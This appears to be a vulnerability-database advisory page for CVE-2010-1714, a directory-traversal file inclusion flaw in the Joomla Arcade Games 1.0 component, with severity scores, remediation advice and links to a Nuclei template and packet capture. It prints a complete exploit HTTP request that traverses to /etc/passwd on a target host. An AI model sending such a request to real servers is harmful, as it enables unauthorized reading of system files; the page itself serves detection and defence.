🔙 목록으로 돌아가기

CVE-2010-1714: Joomla! Component Arcade Games 1.0 - Local File Inclusion

TitleJoomla! Component Arcade Games 1.0 - Local File Inclusion
Authordaffainfo
SeverityMedium
ImpactUnauthenticated attackers can exploit directory traversal through the controller parameter to read arbitrary files from Joomla servers running vulnerable Arcade Games components.
RemediationApply the latest security patches or updates provided by the Joomla! project to fix the LFI vulnerability in the Arcade Games component.
CVSS Score5
EPSS Score0.07007
CVE IDCVE-2010-1714
CWE IDCWE-22
Tags cve2010 cve joomla lfi edb packetstorm dev.pucit.edu.pk vuln

🔍 Vulnerability Description

A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.

🌐 HTTP Request

GET /index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-1714.yaml

🦈 Packet Capture: ⬇️ Download cve-2010-1714.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A